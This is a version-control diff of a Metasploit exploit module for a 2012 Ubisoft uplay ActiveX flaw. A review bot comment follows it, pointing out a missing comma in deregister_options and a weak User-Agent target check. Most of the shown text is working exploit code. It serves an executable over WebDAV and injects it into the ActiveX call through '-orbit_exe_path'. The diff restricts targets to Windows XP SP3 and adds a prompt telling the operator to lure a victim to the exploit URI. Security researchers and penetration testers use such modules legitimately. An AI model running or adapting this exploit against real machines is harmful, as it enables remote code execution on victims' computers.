Lots of changes before commit.

unstable
sinn3r 2012-08-06 11:54:08 -05:00
parent 25b2b2de68
commit 69ff9e7c1c
1 changed files with 30 additions and 31 deletions


@ -1,7 +1,3 @@
##
# $Id$
##
## ##
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
@ -17,25 +13,14 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking
#:classid => "{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}" # Does not get registered in IE properly?
})
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Ubisoft uplay Active X Control Arbitrary Code Execution', 'Name' => 'Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution',
'Description' => %q{ 'Description' => %q{
The uplay ActiveX component allows an attacker to execute any command line action. The uplay ActiveX component allows an attacker to execute any command line action.
User must sign in, unless auto-sign in is enabled and uplay must not already be running. User must sign in, unless auto-sign in is enabled and uplay must not already be
running. Due to the way the malicious executable is served (WebDAV), the module
The exploit will request an exe payload over WebDAV, and must be running on port 80. must be run on port 80, so please make sure you have enough privilege to do that.
Tested in Win XP, does not appear to work in Win7.
Ubisoft released patch 2.04 as of Mon 20th July. Ubisoft released patch 2.04 as of Mon 20th July.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
@ -46,15 +31,15 @@ class Metasploit3 < Msf::Exploit::Remote
'phillips321 <phillips321[at]phillips321.co.uk>', 'phillips321 <phillips321[at]phillips321.co.uk>',
'Richard Hicks <scriptmonkeyblog[at]gmail.com>' 'Richard Hicks <scriptmonkeyblog[at]gmail.com>'
], ],
'Version' => '$Revision$',
'References' => 'References' =>
[ [
[ 'OSVDB', 'http://osvdb.org/show/osvdb/84402'],
[ 'URL', 'http://seclists.org/fulldisclosure/2012/Jul/375'] [ 'URL', 'http://seclists.org/fulldisclosure/2012/Jul/375']
], ],
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], [ 'Automatic', { } ]
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 29 2012')) 'DisclosureDate' => 'Jul 29 2012'))
@ -66,11 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('EXPLOITPATH', [false, "The URI to use for the exploit"]) OptString.new('EXPLOITPATH', [false, "The URI to use for the exploit"])
], self.class) ], self.class)
deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT' 'URIPATH') # WebDAV does not support SSL and must run over port 80. # WebDAV does not support SSL and must run over port 80.
deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT' 'URIPATH')
@basename = rand_text_alpha(8)
@share_name = rand_text_alpha(8)
@extensions = "exe"
end end
def autofilter def autofilter
@ -81,6 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote
use_zlib use_zlib
end end
def is_exploitable?(req)
# Only engage Win XP SP3 targets
req.headers['User-Agent'] =~ /NT 5\.1/
end
def on_request_uri(cli, request) def on_request_uri(cli, request)
case request.method case request.method
when 'OPTIONS' when 'OPTIONS'
@ -89,7 +76,15 @@ class Metasploit3 < Msf::Exploit::Remote
process_propfind(cli, request) process_propfind(cli, request)
when 'GET' when 'GET'
if request.uri_parts['Resource'].include? @uplay_uri if request.uri_parts['Resource'].include? @uplay_uri
if is_exploitable?(request)
prompt_uplay(cli, request) prompt_uplay(cli, request)
else
print_error("Not the target we want, will not engage.")
resp = create_response(404, "Not Found")
resp.body = ""
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
end
else else
process_get(cli, request) process_get(cli, request)
end end
@ -409,6 +404,10 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
end end
def exploit def exploit
@basename = rand_text_alpha(8)
@share_name = rand_text_alpha(8)
@extensions = "exe"
if datastore['EXPLOITPATH'] if datastore['EXPLOITPATH']
@uplay_uri = datastore['EXPLOITPATH'] @uplay_uri = datastore['EXPLOITPATH']
else else
@ -424,7 +423,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
end end
vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe") vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe")
print_status("Exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}") print_good("Please let your victim browse to this exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}")
super super
end end
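Review bot: The `deregister_options` call kept on the new side in the third hunk is missing a comma between `'SRVPORT'` and `'URIPATH'`, so Ruby concatenates the adjacent literals into the single option name `'SRVPORTURIPATH'` and neither SRVPORT nor URIPATH is actually deregistered. This contradicts the comment the commit adds right above it (WebDAV must run over port 80) and leaves the user free to set SRVPORT to another value, which the new `print_good` line in the last hunk would then echo as the exploit URI. The fix is `deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT', 'URIPATH')`. Separately, `is_exploitable?` only inspects the User-Agent header, which is a weak discriminator for the stated "Win XP SP3 only" intent; a comment such as `# Heuristic only: User-Agent is client-supplied and easily wrong` would make that limitation explicit to maintainers. The enclosing `initialize` method begins outside the hunk where the `deregister_options` line appears.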